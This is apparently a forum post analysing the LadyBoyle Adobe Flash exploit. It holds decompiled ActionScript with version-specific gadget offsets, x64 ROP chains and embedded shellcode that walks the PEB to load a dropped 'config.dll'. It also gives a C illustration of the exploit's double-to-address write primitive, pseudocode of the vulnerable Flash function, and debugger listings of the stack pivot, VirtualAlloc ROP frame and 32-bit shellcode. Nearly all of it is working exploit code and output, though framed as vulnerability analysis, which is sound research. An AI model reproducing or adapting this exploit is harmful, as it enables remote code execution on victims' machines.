                            _loc_25 = _loc_16 - 0x4315aa;
                            _loc_26 = _loc_16 - 0xa00a52 + 0x600fbc;
                            _loc_36 = _loc_16 - 0xa38d39;
                            _loc_37 = _loc_16 - 0xa00a52;
                            _loc_38 = _loc_16 - 0xa3770b;
                            _loc_39 = _loc_16 - 0x457887;
                            _loc_40 = _loc_16 - 0x4315aa - 0x59c616;
                        }
                        break;
                    }
                    case "win 11,4,402,278":
                    {
                        if (Capabilities.playerType.toLowerCase() == "activex")
                        {
                            _loc_25 = _loc_16 - 0x3fb3a5;
                            _loc_26 = _loc_16 - 0x3ff6f6;
                            _loc_36 = _loc_16 - 0x46771b;
                            _loc_37 = _loc_16 - 0x45b6a2;
                            _loc_38 = _loc_16 - 0x5e7d87;
                            _loc_39 = _loc_16 - 0x4574af;
                            _loc_40 = _loc_16 - 0x17d490;
                        }
                        break;
                    }
                    case "win 11,4,402,265":
                    {
                        if (Capabilities.playerType.toLowerCase() == "activex")
                        {
                            _loc_25 = _loc_16 - 0x3fb3a5;
                            _loc_26 = _loc_16 - 0x3ff6f6;
                            _loc_36 = _loc_16 - 0x1c774f;
                            _loc_37 = _loc_16 - 0x117ec7;
                            _loc_38 = _loc_16 - 0x1c0bce;
                            _loc_39 = _loc_16 - 0x4574af;
                            _loc_40 = _loc_16 - 0xe2870;
                        }
                        break;
                    }
                    default:
                    {
                        // Unlike the 32-bit path, an unsupported 64-bit build is not repaired; the sample just hangs.
                        while (1)
                        {
                            
                        }
                        break;
                    }
                }
                _loc_17.endian = Endian.LITTLE_ENDIAN;
                _loc_34 = _loc_17.position;
                // x64 ROP chain: every pointer or argument is written as a low dword followed by its high dword
                // (0 for addresses in the Flash module, _loc_31 for heap addresses). _loc_25 goes to the hijacked
                // slot at +224, _loc_12 + 256 is the x64 shellcode written below; _loc_36.._loc_40 and _loc_26 are
                // the per-version gadgets from the switch, and 64 (PAGE_EXECUTE_READWRITE) and 0x2000 recur as arguments.
                _loc_17.position = _loc_17.position + 224;
                _loc_17.writeUnsignedInt(_loc_25);
                _loc_17.position = _loc_34;
                _loc_17.position = _loc_17.position + 160;
                _loc_17.writeUnsignedInt(_loc_12 + 256);
                _loc_17.writeUnsignedInt(_loc_31);
                _loc_17.position = _loc_34;
                _loc_17.writeUnsignedInt(_loc_37);
                _loc_17.writeUnsignedInt(0);
                _loc_17.writeUnsignedInt(64);
                _loc_17.writeUnsignedInt(0);
                _loc_17.writeUnsignedInt(_loc_39);
                _loc_17.writeUnsignedInt(0);
                _loc_17.position = _loc_17.position + 40;
                _loc_17.writeUnsignedInt(_loc_36);
                _loc_17.writeUnsignedInt(0);
                _loc_17.writeUnsignedInt(_loc_12 + 256);
                _loc_17.writeUnsignedInt(_loc_31);
                _loc_17.writeUnsignedInt(_loc_38);
                _loc_17.writeUnsignedInt(0);
                _loc_17.writeUnsignedInt(0x2000);
                _loc_17.writeUnsignedInt(0);
                _loc_17.writeUnsignedInt(_loc_37);
                _loc_17.writeUnsignedInt(0);
                _loc_17.writeUnsignedInt(_loc_26);
                _loc_17.writeUnsignedInt(0);
                _loc_17.writeUnsignedInt(_loc_40);
                _loc_17.writeUnsignedInt(0);
                _loc_17.position = _loc_34 + 256;
                // x64 stage: 90 90 fc 55 48 83 e4 f0 48 33 d2 65 48 8b 52 60 = nop; nop; cld; push rbp; and rsp,-16;
                // xor rdx,rdx; mov rdx,gs:[rdx+0x60] (PEB), followed by the usual loader-list / export-table walk
                // keyed by 32-bit API hashes (0x0726774c, LoadLibraryA in the common ror13 scheme, appears in a
                // mov r10 further down) and the file name "config.dll" assembled from immediates.
                _loc_17.writeUnsignedInt(0x55fc9090);
                _loc_17.writeUnsignedInt(0xf0e48348);
                _loc_17.writeUnsignedInt(0x65d23348);
                _loc_17.writeUnsignedInt(0x60528b48);
                _loc_17.writeUnsignedInt(0x18528b48);
                _loc_17.writeUnsignedInt(0x20528b48);
                _loc_17.writeUnsignedInt(0x50728b48);
                _loc_17.writeUnsignedInt(0x4ab70f48);
                _loc_17.writeUnsignedInt(0xc9334d4a);
                _loc_17.writeUnsignedInt(0xacc03348);
                _loc_17.writeUnsignedInt(0x27c613c);
                _loc_17.writeUnsignedInt(0xc141202c);
                _loc_17.writeUnsignedInt(0x3440dc9);
                _loc_17.writeUnsignedInt(0x52ede2c8);
                _loc_17.writeUnsignedInt(0xba495141);
                _loc_17.writeUnsignedInt(0x92af16da);
                _loc_17.writeUnsignedInt(0);
                _loc_17.writeUnsignedInt(0x75ca3b4d);
                _loc_17.writeUnsignedInt(0x528b4845);
                _loc_17.writeUnsignedInt(0x3c428b20);
                _loc_17.writeUnsignedInt(0x8bc20348);
                _loc_17.writeUnsignedInt(0x8880);
                _loc_17.writeUnsignedInt(0xc0854800);
                _loc_17.writeUnsignedInt(0x81483074);
                _loc_17.writeUnsignedInt(0x180ec);
                _loc_17.writeUnsignedInt(0xfc8b4800);
                _loc_17.writeUnsignedInt(0x80ec8148);
                _loc_17.writeUnsignedInt(0x48000000);
                _loc_17.writeUnsignedInt(0x8b50c203);
                _loc_17.writeUnsignedInt(0x8b441848);
                _loc_17.writeUnsignedInt(0x34c2040);
                _loc_17.writeUnsignedInt(0x4c8948c2);
                _loc_17.writeUnsignedInt(0x894c1824);
                _loc_17.writeUnsignedInt(0x48202444);
                _loc_17.writeUnsignedInt(0x28244489);
                _loc_17.writeUnsignedInt(0x594108eb);
                _loc_17.writeUnsignedInt(0x128b485a);
                _loc_17.writeUnsignedInt(0x415182eb);
                _loc_17.writeUnsignedInt(0xdaba4950);
                _loc_17.writeUnsignedInt(0x14fdaf6);
                _loc_17.writeUnsignedInt(0xe8000000);
                _loc_17.writeUnsignedInt(315);
                _loc_17.writeUnsignedInt(0x49078948);
                _loc_17.writeUnsignedInt(0xae572dba);
                _loc_17.writeUnsignedInt(347);
                _loc_17.writeUnsignedInt(0x129e800);
                _loc_17.writeUnsignedInt(0x89480000);
                _loc_17.writeUnsignedInt(0xba490847);
                _loc_17.writeUnsignedInt(0x528796c6);
                _loc_17.writeUnsignedInt(1);
                _loc_17.writeUnsignedInt(0x116e8);
                _loc_17.writeUnsignedInt(0x47894800);
                _loc_17.writeUnsignedInt(0x4cba4910);
                _loc_17.writeUnsignedInt(0x1072677);
                _loc_17.writeUnsignedInt(0xe8000000);
                _loc_17.writeUnsignedInt(259);
                _loc_17.writeUnsignedInt(0x18478948);
                _loc_17.writeUnsignedInt(0xf330ba49);
                _loc_17.writeUnsignedInt(0xe449);
                _loc_17.writeUnsignedInt(0xf0e80000);
                _loc_17.writeUnsignedInt(0x48000000);
                _loc_17.writeUnsignedInt(0x48204789);
                _loc_17.writeUnsignedInt(0x8d48f78b);
                _loc_17.writeUnsignedInt(0x80be);
                _loc_17.writeUnsignedInt(0x40b900);
                _loc_17.writeUnsignedInt(0x33480000);
                _loc_17.writeUnsignedInt(0xb9abf3c0);
                _loc_17.writeUnsignedInt(256);
                _loc_17.writeUnsignedInt(0x80868d48);
                _loc_17.writeUnsignedInt(0x48000000);
                _loc_17.writeUnsignedInt(0x8b48d08b);
                _loc_17.writeUnsignedInt(0x568b4cd8);
                _loc_17.writeUnsignedInt(0xd2ff4120);
                _loc_17.writeUnsignedInt(0x80868d48);
                _loc_17.writeUnsignedInt(0x48000000);
                _loc_17.writeUnsignedInt(0x3348c933);
                _loc_17.writeUnsignedInt(0x30c8adb);
                _loc_17.writeUnsignedInt(0x80c3ff48);
                _loc_17.writeUnsignedInt(0xf57500f9);
                _loc_17.writeUnsignedInt(0xc7cbff48);
                _loc_17.writeUnsignedInt(0x6f630304);
                _loc_17.writeUnsignedInt(0x44c7666e);
                _loc_17.writeUnsignedInt(0x67690403);
                _loc_17.writeUnsignedInt(0x44c7642e);
                _loc_17.writeUnsignedInt(0x6c6c0803);
                _loc_17.writeUnsignedInt(0x33450000);
                _loc_17.writeUnsignedInt(0x44c748c9);
                _loc_17.writeUnsignedInt(0x3024);
                _loc_17.writeUnsignedInt(0x8d480000);
                _loc_17.writeUnsignedInt(0x808e);
                _loc_17.writeUnsignedInt(0x2b84100);
                _loc_17.writeUnsignedInt(0x48000000);
                _loc_17.writeUnsignedInt(0xc2c7);
                _loc_17.writeUnsignedInt(0x44c74000);
                _loc_17.writeUnsignedInt(0x802824);
                _loc_17.writeUnsignedInt(0x44c70000);
                _loc_17.writeUnsignedInt(0x22024);
                _loc_17.writeUnsignedInt(0x8b4c0000);
                _loc_17.writeUnsignedInt(0xd2ff4116);
                _loc_17.writeUnsignedInt(0x48d88b48);
                _loc_17.writeUnsignedInt(0xffff883);
                _loc_17.writeUnsignedInt(0x9c84);
                _loc_17.writeUnsignedInt(0x4c8d4c00);
                _loc_17.writeUnsignedInt(0xba484024);
                _loc_17.writeUnsignedInt(0x42424242);
                _loc_17.writeUnsignedInt(0x42424242);
                _loc_17.writeUnsignedInt(0xb8419090);
                _loc_17.writeUnsignedInt(0x41414141);
                _loc_17.writeUnsignedInt(0x48cb8b48);
                _loc_17.writeUnsignedInt(0x202444c7);
                _loc_17.writeUnsignedInt(0);
                _loc_17.writeUnsignedInt(0x8568b4c);
                _loc_17.writeUnsignedInt(0x48d2ff41);
                _loc_17.writeUnsignedInt(0x7400f883);
                _loc_17.writeUnsignedInt(0xcb8b486c);
                _loc_17.writeUnsignedInt(0x10568b4c);
                _loc_17.writeUnsignedInt(0x48d2ff41);
                _loc_17.writeUnsignedInt(0x808e8d);
                _loc_17.writeUnsignedInt(0x8b4c0000);
                _loc_17.writeUnsignedInt(0xff411856);
                _loc_17.writeUnsignedInt(0x4852ebd2);
                _loc_17.writeUnsignedInt(0x10244c8b);
                _loc_17.writeUnsignedInt(0x24448b4c);
                _loc_17.writeUnsignedInt(0xc9ff4808);
                _loc_17.writeUnsignedInt(0x88348b41);
                _loc_17.writeUnsignedInt(0x4df20348);
                _loc_17.writeUnsignedInt(0x3348c933);
                _loc_17.writeUnsignedInt(0xc141acc0);
                _loc_17.writeUnsignedInt(0x3440dc9);
                _loc_17.writeUnsignedInt(0x75c43ac8);
                _loc_17.writeUnsignedInt(0xc18149f1);
                _loc_17.writeUnsignedInt(0x92af16da);
                _loc_17.writeUnsignedInt(0x75ca3b45);
                _loc_17.writeUnsignedInt(0x448b48d8);
                _loc_17.writeUnsignedInt(0x8b444024);
                _loc_17.writeUnsignedInt(0x34c2440);
                _loc_17.writeUnsignedInt(0x8b4166c2);
                _loc_17.writeUnsignedInt(0x8b44480c);
                _loc_17.writeUnsignedInt(0x34c1c40);
                _loc_17.writeUnsignedInt(0x48b41c2);
                _loc_17.writeUnsignedInt(0xc2034888);
                _loc_17.writeUnsignedInt(0xb94990c3);
                _loc_17.writeUnsignedInt(0x47474747);
                _loc_17.writeUnsignedInt(0x41474747);
                _loc_17.writeUnsignedInt(0x1001c741);
                _loc_17.writeUnsignedInt(0x4d000000);
                _loc_17.writeUnsignedInt(0xff70818d);
                _loc_17.writeUnsignedInt(0x8b49ffff);
                _loc_17.writeUnsignedInt(0x894901);
                _loc_17.writeUnsignedInt(0x8418b49);
                _loc_17.writeUnsignedInt(0x8408949);
                _loc_17.writeUnsignedInt(0xb9499090);
                _loc_17.writeUnsignedInt(0x48484848);
                _loc_17.writeUnsignedInt(0x48484848);
                _loc_17.writeUnsignedInt(0xb8419090);
                _loc_17.writeUnsignedInt(0x49494949);
                _loc_17.writeUnsignedInt(0x41018945);
                _loc_17.writeUnsignedInt(0x441c7);
                _loc_17.writeUnsignedInt(0x48000000);
                _loc_17.writeUnsignedInt(0xc3a8658d);
                _loc_17.writeUnsignedInt(0x90909090);
                _loc_18.data.now = new Date().time;
                _loc_18.flush();
                _loc_18.close();
                _loc_35 = new this.the_x64_Class();
                _loc_17.writeBytes(_loc_35, 0, _loc_35.length);
                _loc_12 = _loc_13;
                _loc_15 = (_loc_12 + 128 - _loc_10 - 16) / 8;
                _loc_12 = this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, _loc_15)[0];
                _loc_15 = (_loc_12 + 16 - _loc_10 - 16) / 8;
                _loc_12 = this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, _loc_15)[0];
                _loc_12 = _loc_12 + _loc_14;
                _loc_17.position = _loc_14;
                _loc_34 = _loc_17.position;
                _loc_17.position = _loc_17.position + 224;
                _loc_17.writeUnsignedInt(_loc_25);
                _loc_17.position = _loc_34;
                _loc_17.position = _loc_17.position + 160;
                _loc_17.writeUnsignedInt(_loc_12 + 256);
                _loc_17.writeUnsignedInt(_loc_31);
                _loc_17.position = _loc_34;
                _loc_17.writeUnsignedInt(_loc_37);
                _loc_17.writeUnsignedInt(0);
                _loc_17.writeUnsignedInt(64);
                _loc_17.writeUnsignedInt(0);
                _loc_17.writeUnsignedInt(_loc_39);
                _loc_17.writeUnsignedInt(0);
                _loc_17.position = _loc_17.position + 40;
                _loc_17.writeUnsignedInt(_loc_36);
                _loc_17.writeUnsignedInt(0);
                _loc_17.writeUnsignedInt(_loc_12 + 256);
                _loc_17.writeUnsignedInt(_loc_31);
                _loc_17.writeUnsignedInt(_loc_38);
                _loc_17.writeUnsignedInt(0);
                _loc_17.writeUnsignedInt(0x2000);
                _loc_17.writeUnsignedInt(0);
                _loc_17.writeUnsignedInt(_loc_37);
                _loc_17.writeUnsignedInt(0);
                _loc_17.writeUnsignedInt(_loc_26);
                _loc_17.writeUnsignedInt(0);
                _loc_17.writeUnsignedInt(_loc_40);
                _loc_17.writeUnsignedInt(0);
                _loc_17.position = _loc_34 + 256;
                _loc_17.writeUnsignedInt(0x55fc9090);
                _loc_17.writeUnsignedInt(0xf0e48348);
                _loc_17.writeUnsignedInt(0x65d23348);
                _loc_17.writeUnsignedInt(0x60528b48);
                _loc_17.writeUnsignedInt(0x18528b48);
                _loc_17.writeUnsignedInt(0x20528b48);
                _loc_17.writeUnsignedInt(0x50728b48);
                _loc_17.writeUnsignedInt(0x4ab70f48);
                _loc_17.writeUnsignedInt(0xc9334d4a);
                _loc_17.writeUnsignedInt(0xacc03348);
                _loc_17.writeUnsignedInt(0x27c613c);
                _loc_17.writeUnsignedInt(0xc141202c);
                _loc_17.writeUnsignedInt(0x3440dc9);
                _loc_17.writeUnsignedInt(0x52ede2c8);
                _loc_17.writeUnsignedInt(0xba495141);
                _loc_17.writeUnsignedInt(0x92af16da);
                _loc_17.writeUnsignedInt(0);
                _loc_17.writeUnsignedInt(0x75ca3b4d);
                _loc_17.writeUnsignedInt(0x528b4845);
                _loc_17.writeUnsignedInt(0x3c428b20);
                _loc_17.writeUnsignedInt(0x8bc20348);
                _loc_17.writeUnsignedInt(0x8880);
                _loc_17.writeUnsignedInt(0xc0854800);
                _loc_17.writeUnsignedInt(0x81483074);
                _loc_17.writeUnsignedInt(0x180ec);
                _loc_17.writeUnsignedInt(0xfc8b4800);
                _loc_17.writeUnsignedInt(0x80ec8148);
                _loc_17.writeUnsignedInt(0x48000000);
                _loc_17.writeUnsignedInt(0x8b50c203);
                _loc_17.writeUnsignedInt(0x8b441848);
                _loc_17.writeUnsignedInt(0x34c2040);
                _loc_17.writeUnsignedInt(0x4c8948c2);
                _loc_17.writeUnsignedInt(0x894c1824);
                _loc_17.writeUnsignedInt(0x48202444);
                _loc_17.writeUnsignedInt(0x28244489);
                _loc_17.writeUnsignedInt(0x594108eb);
                _loc_17.writeUnsignedInt(0x128b485a);
                _loc_17.writeUnsignedInt(0x415182eb);
                _loc_17.writeUnsignedInt(0xdaba4950);
                _loc_17.writeUnsignedInt(0x14fdaf6);
                _loc_17.writeUnsignedInt(0xe8000000);
                _loc_17.writeUnsignedInt(315);
                _loc_17.writeUnsignedInt(0x49078948);
                _loc_17.writeUnsignedInt(0xae572dba);
                _loc_17.writeUnsignedInt(347);
                _loc_17.writeUnsignedInt(0x129e800);
                _loc_17.writeUnsignedInt(0x89480000);
                _loc_17.writeUnsignedInt(0xba490847);
                _loc_17.writeUnsignedInt(0x528796c6);
                _loc_17.writeUnsignedInt(1);
                _loc_17.writeUnsignedInt(0x116e8);
                _loc_17.writeUnsignedInt(0x47894800);
                _loc_17.writeUnsignedInt(0x4cba4910);
                _loc_17.writeUnsignedInt(0x1072677);
                _loc_17.writeUnsignedInt(0xe8000000);
                _loc_17.writeUnsignedInt(259);
                _loc_17.writeUnsignedInt(0x18478948);
                _loc_17.writeUnsignedInt(0xf330ba49);
                _loc_17.writeUnsignedInt(0xe449);
                _loc_17.writeUnsignedInt(0xf0e80000);
                _loc_17.writeUnsignedInt(0x48000000);
                _loc_17.writeUnsignedInt(0x48204789);
                _loc_17.writeUnsignedInt(0x8d48f78b);
                _loc_17.writeUnsignedInt(0x80be);
                _loc_17.writeUnsignedInt(0x40b900);
                _loc_17.writeUnsignedInt(0x33480000);
                _loc_17.writeUnsignedInt(0xb9abf3c0);
                _loc_17.writeUnsignedInt(256);
                _loc_17.writeUnsignedInt(0x80868d48);
                _loc_17.writeUnsignedInt(0x48000000);
                _loc_17.writeUnsignedInt(0x8b48d08b);
                _loc_17.writeUnsignedInt(0x568b4cd8);
                _loc_17.writeUnsignedInt(0xd2ff4120);
                _loc_17.writeUnsignedInt(0x80868d48);
                _loc_17.writeUnsignedInt(0x48000000);
                _loc_17.writeUnsignedInt(0x3348c933);
                _loc_17.writeUnsignedInt(0x30c8adb);
                _loc_17.writeUnsignedInt(0x80c3ff48);
                _loc_17.writeUnsignedInt(0xf57500f9);
                _loc_17.writeUnsignedInt(0xc7cbff48);
                _loc_17.writeUnsignedInt(0x6f630304);
                _loc_17.writeUnsignedInt(0x44c7666e);
                _loc_17.writeUnsignedInt(0x67690403);
                _loc_17.writeUnsignedInt(0x44c7642e);
                _loc_17.writeUnsignedInt(0x6c6c0803);
                _loc_17.writeUnsignedInt(0x33450000);
                _loc_17.writeUnsignedInt(0x44c748c9);
                _loc_17.writeUnsignedInt(0x3024);
                _loc_17.writeUnsignedInt(0x8d480000);
                _loc_17.writeUnsignedInt(0x808e);
                _loc_17.writeUnsignedInt(0x2b84100);
                _loc_17.writeUnsignedInt(0x48000000);
                _loc_17.writeUnsignedInt(0xc2c7);
                _loc_17.writeUnsignedInt(0x44c74000);
                _loc_17.writeUnsignedInt(0x802824);
                _loc_17.writeUnsignedInt(0x44c70000);
                _loc_17.writeUnsignedInt(0x22024);
                _loc_17.writeUnsignedInt(0x8b4c0000);
                _loc_17.writeUnsignedInt(0xd2ff4116);
                _loc_17.writeUnsignedInt(0x48d88b48);
                _loc_17.writeUnsignedInt(0xffff883);
                _loc_17.writeUnsignedInt(0x9c84);
                _loc_17.writeUnsignedInt(0x4c8d4c00);
                _loc_17.writeUnsignedInt(0xba484024);
                _loc_17.writeUnsignedInt(_loc_12 + 900);
                _loc_17.writeUnsignedInt(_loc_31);
                _loc_17.writeUnsignedInt(0xb8419090);
                _loc_17.writeUnsignedInt(_loc_35.length);
                _loc_17.writeUnsignedInt(0x48cb8b48);
                _loc_17.writeUnsignedInt(0x202444c7);
                _loc_17.writeUnsignedInt(0);
                _loc_17.writeUnsignedInt(0x8568b4c);
                _loc_17.writeUnsignedInt(0x48d2ff41);
                _loc_17.writeUnsignedInt(0x7400f883);
                _loc_17.writeUnsignedInt(0xcb8b486c);
                _loc_17.writeUnsignedInt(0x10568b4c);
                _loc_17.writeUnsignedInt(0x48d2ff41);
                _loc_17.writeUnsignedInt(0x808e8d);
                _loc_17.writeUnsignedInt(0x8b4c0000);
                _loc_17.writeUnsignedInt(0xff411856);
                _loc_17.writeUnsignedInt(0x4852ebd2);
                _loc_17.writeUnsignedInt(0x10244c8b);
                _loc_17.writeUnsignedInt(0x24448b4c);
                _loc_17.writeUnsignedInt(0xc9ff4808);
                _loc_17.writeUnsignedInt(0x88348b41);
                _loc_17.writeUnsignedInt(0x4df20348);
                _loc_17.writeUnsignedInt(0x3348c933);
                _loc_17.writeUnsignedInt(0xc141acc0);
                _loc_17.writeUnsignedInt(0x3440dc9);
                _loc_17.writeUnsignedInt(0x75c43ac8);
                _loc_17.writeUnsignedInt(0xc18149f1);
                _loc_17.writeUnsignedInt(0x92af16da);
                _loc_17.writeUnsignedInt(0x75ca3b45);
                _loc_17.writeUnsignedInt(0x448b48d8);
                _loc_17.writeUnsignedInt(0x8b444024);
                _loc_17.writeUnsignedInt(0x34c2440);
                _loc_17.writeUnsignedInt(0x8b4166c2);
                _loc_17.writeUnsignedInt(0x8b44480c);
                _loc_17.writeUnsignedInt(0x34c1c40);
                _loc_17.writeUnsignedInt(0x48b41c2);
                _loc_17.writeUnsignedInt(0xc2034888);
                _loc_17.writeUnsignedInt(0xb94990c3);
                _loc_17.writeUnsignedInt(_loc_10);
                _loc_17.writeUnsignedInt(_loc_31);
                _loc_17.writeUnsignedInt(0x1001c741);
                _loc_17.writeUnsignedInt(0x4d000000);
                _loc_17.writeUnsignedInt(0xff70818d);
                _loc_17.writeUnsignedInt(0x8b49ffff);
                _loc_17.writeUnsignedInt(0x894901);
                _loc_17.writeUnsignedInt(0x8418b49);
                _loc_17.writeUnsignedInt(0x8408949);
                _loc_17.writeUnsignedInt(0xb9499090);
                _loc_17.writeUnsignedInt(_loc_11);
                _loc_17.writeUnsignedInt(_loc_31);
                _loc_17.writeUnsignedInt(0xb8419090);
                _loc_17.writeUnsignedInt(_loc_16);
                _loc_17.writeUnsignedInt(0x41018945);
                _loc_17.writeUnsignedInt(0x441c7);
                _loc_17.writeUnsignedInt(0x48000000);
                _loc_17.writeUnsignedInt(0xc3a8658d);
                _loc_17.writeUnsignedInt(0x90909090);
                _loc_15 = (_loc_11 - _loc_10 - 16) / 8;
                (_loc_5[_loc_7][_loc_22] as Vector.<Number>)[_loc_15] = this.UintToDouble(_loc_12, _loc_31);
                new Number(_loc_6.toString());
                return;
            }
            while (1)
            {
                
            }
            return;
        }// end function

        public function randRange(param1:Number, param2:Number) : Number
        {
            var _loc_3:* = Math.floor(Math.random() * (param2 - param1 + 1)) + param1;
            return _loc_3;
        }// end function

        public function empty() : void
        {
            var _loc_1:* = new TextField();
            _loc_1.autoSize = TextFieldAutoSize.LEFT;
            var _loc_2:* = new TextFormat();
            _loc_2.size = 30;
            _loc_2.font = "Arial";
            _loc_2.color = 0xff0000;
            _loc_1.setTextFormat(_loc_2);
            _loc_1.text = "      ";
            addChild(_loc_1);
            return;
        }// end function

        // Packs two 32-bit words into the raw bit pattern of a Number: param1 becomes the
        // low dword and param2 the high dword (the ByteArray is written little-endian).
        // This is how the exploit turns an address into a value it can store in a Vector.<Number>.
        public function UintToDouble(param1:uint, param2:uint) : Number
        {
            var _loc_3:* = new ByteArray();
            _loc_3.endian = Endian.LITTLE_ENDIAN;
            _loc_3.writeInt(param1);
            _loc_3.writeInt(param2);
            _loc_3.position = 0;
            return _loc_3.readDouble();
        }// end function

        // Inverse of UintToDouble: reads element param2 of the Vector.<Number> and returns its
        // raw bits as [low dword, high dword]. A fresh ByteArray is big-endian by default, so
        // bytes 0..3 of the written double are the high word and bytes 4..7 the low word.
        public function ReadDouble(param1:Vector.<Number>, param2:uint) : Vector.<uint>
        {
            var _loc_3:* = new Vector.<uint>(2);
            var _loc_4:* = param1[param2];
            var _loc_5:* = new ByteArray();
            _loc_5.writeDouble(_loc_4);
            _loc_3[1] = _loc_5[0] * 0x1000000 + _loc_5[1] * 0x10000 + _loc_5[2] * 256 + _loc_5[3];
            _loc_3[0] = _loc_5[4] * 0x1000000 + _loc_5[5] * 0x10000 + _loc_5[6] * 256 + _loc_5[7];
            return _loc_3;
        }// end function

    }
}
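The UintToDouble/ReadDouble pair above is the exploit's conversion layer between addresses and the doubles a Vector.<Number> stores, and the index arithmetic `(target - _loc_10 - 16) / 8` in the listing is what turns an absolute address into an element index. As an added example (not code from the original post or from the LadyBoyle sample), here is that layer in C, together with a constructed memory image that shows the resulting write primitive. The assumption, taken from the arithmetic, is that _loc_10 is the address the element storage is measured from, with 16 bytes of header before the first 8-byte element; the sample pointer value and all function names are constructed for the example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* LadyBoyle.UintToDouble: lo becomes the low dword and hi the high dword of
   the Number's raw bit pattern (the AS3 version writes them little-endian). */
static double uint_to_double(uint32_t lo, uint32_t hi)
{
    uint64_t bits = ((uint64_t)hi << 32) | lo;
    double d;
    memcpy(&d, &bits, sizeof d);                 /* bit copy, no conversion */
    return d;
}

/* LadyBoyle.ReadDouble: splits a Number's raw bits into [low dword, high dword]. */
static void read_double(double d, uint32_t *lo, uint32_t *hi)
{
    uint64_t bits;
    memcpy(&bits, &d, sizeof bits);
    *lo = (uint32_t)bits;
    *hi = (uint32_t)(bits >> 32);
}

/* Round trip of an arbitrary word pair through the double representation. */
static int roundtrip_ok(uint32_t lo, uint32_t hi)
{
    uint32_t lo2, hi2;
    read_double(uint_to_double(lo, hi), &lo2, &hi2);
    return lo2 == lo && hi2 == hi;
}

/* Element index that makes a Vector.<Number> access land on `target`, as in
   the listing: 16 header bytes, then 8-byte elements (assumption: base == _loc_10). */
static uint64_t slot_index(uint64_t target, uint64_t base)
{
    return (target - base - 16) / 8;
}

/* A high word with all eleven exponent bits set encodes a NaN. A runtime that
   canonicalises NaNs on store would rewrite such a value, so a pointer smuggled
   through a double must stay out of that range (user-mode addresses do). */
static int is_nan_pattern(uint32_t hi)
{
    return (hi & 0x7FF00000u) == 0x7FF00000u;
}

/* Constructed memory image: 16-byte header followed by 8-byte slots. Writes a
   64-bit value at absolute address `target` through the double-typed slot
   array, which is what a length-corrupted Vector.<Number> lets the exploit do,
   then reads the bytes back to confirm the write landed bit-exact. */
static int demo_write_primitive(void)
{
    static uint64_t backing[16];                 /* 128 bytes, 8-byte aligned */
    uint8_t *mem = (uint8_t *)backing;
    uint64_t base = (uint64_t)(uintptr_t)mem;
    double *slots = (double *)(mem + 16);
    uint64_t target = base + 16 + 8 * 5;         /* sixth element */
    uint32_t lo = 0x7C809AE1u, hi = 0x00007FF6u; /* constructed pointer value */

    if (is_nan_pattern(hi))
        return 0;
    slots[slot_index(target, base)] = uint_to_double(lo, hi);

    uint64_t got;
    memcpy(&got, mem + (target - base), sizeof got);
    return got == (((uint64_t)hi << 32) | lo);
}

int main(void)
{
    uint32_t lo, hi;
    read_double(uint_to_double(0x41414141u, 0x42424242u), &lo, &hi);
    printf("lo=%08X hi=%08X roundtrip=%d\n", lo, hi, roundtrip_ok(0x7C809AE1u, 0));
    printf("index for target=base+0x38: %llu\n",
           (unsigned long long)slot_index(0x1000 + 0x38, 0x1000));
    printf("write primitive ok: %d\n", demo_write_primitive());
    return 0;
}
```

The listing reads `ReadDouble(...)[0]`, i.e. the low word, as the 32-bit address it chains through; on the x64 path both words matter, which is why the frame writes each pointer as a low dword followed by `_loc_31`.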

The code is full of hard-coded values, address arithmetic and heap spraying; see the paper in reply #5 for the detailed analysis.
The overflow is in sub_1054EA10 of Flash32_11_5_502_146.ocx:
unsigned int __thiscall sub_1054EA10(void *this, unsigned int a2, int a3)
{
  void *v3; // esi@1
  int v4; // ecx@1
  int v5; // ebx@1
  unsigned int result; // eax@4
  unsigned int v7; // esi@6
  int v8; // eax@9
  double v9; // [sp+Ch] [bp-8h]@1

  v3 = this;
  v9 = sub_10505BD0(a3);
  v4 = *((_DWORD *)v3 + 6);
  v5 = (int)((char *)v3 + 24);
  if ( a2 >= *(_DWORD *)v4 && a2 >= *(_DWORD *)v4 - (unsigned int)*((_BYTE *)v3 + 20) + 1 )
    sub_1054D2D0(v3, a2);
  result = *(_DWORD *)v5;
  if ( a2 >= **(_DWORD **)v5 )
  {
    if ( a2 <= 0xFFFFFFFE )
      v7 = a2 + 1;
    else
      v7 = -1;
    if ( result & 0xFFF )
      v8 = *(_WORD *)((result & 0xFFFFF000) + 0x12);
    else
      v8 = sub_104A2BE0(*(_DWORD *)v5);
    if ( v7 > (unsigned int)(v8 - 8) >> 3 )
      sub_1051DDD0(v5, v7);
    result = sub_1051B170(a2 + 1);
  }
  *(_QWORD *)(*(_DWORD *)v5 + 8 * a2 + 8) = *(_QWORD *)&v9; // a2 (the index) and v9 (the double) are attacker-controlled, giving an arbitrary-address QWORD write that is used to overwrite an object's vtable pointer
  return result;
}

In the test environment Flash32_11_5_502_146.ocx is loaded at base address 0x07BD0000.
The vulnerability overwrites the vtable pointer of the object in ecx at this call site:
08125540    8B01            mov     eax, dword ptr [ecx]              ; eax = 0x06944000
08125542    8B50 70         mov     edx, dword ptr [eax+70]           ; edx = 0x084CDC60
08125545    FFD2            call    edx

At 0x084CDC60 in Flash32_11_5_502_146.ocx (the address the sprayed fake vtable holds at offset 0x70, so `call edx` lands here):
084CDC60    94              xchg    eax, esp                          ; stackpivot

ROP chain, laid out at 0x06944000 where the pivot leaves esp: a single VirtualAlloc frame that makes the sprayed region executable and returns into the shellcode at 0x06944088:
06944000  7C809AE1  kernel32.VirtualAlloc
06944004  06944088  /CALL to VirtualAlloc
06944008  06944000  |Address = 06944000
0694400C  00002000  |Size = 2000 (8192.)
06944010  00001000  |AllocationType = MEM_COMMIT
06944014  00000040  \Protect = PAGE_EXECUTE_READWRITE

shellcode:
06944088    90              nop
06944089    60              pushad
0694408A    83EC 70         sub     esp, 70
0694408D    33DB            xor     ebx, ebx
0694408F    64:8B5B 18      mov     ebx, dword ptr fs:[ebx+18]
06944093    8B5B 30         mov     ebx, dword ptr [ebx+30]
06944096    8B5B 0C         mov     ebx, dword ptr [ebx+C]
06944099    8B5B 1C         mov     ebx, dword ptr [ebx+1C]
0694409C    8B53 08         mov     edx, dword ptr [ebx+8]
0694409F    8B7A 3C         mov     edi, dword ptr [edx+3C]
069440A2    8B7C3A 2C       mov     edi, dword ptr [edx+edi+2C]
069440A6    8DBC3A 00E00000 lea     edi, dword ptr [edx+edi+E000]
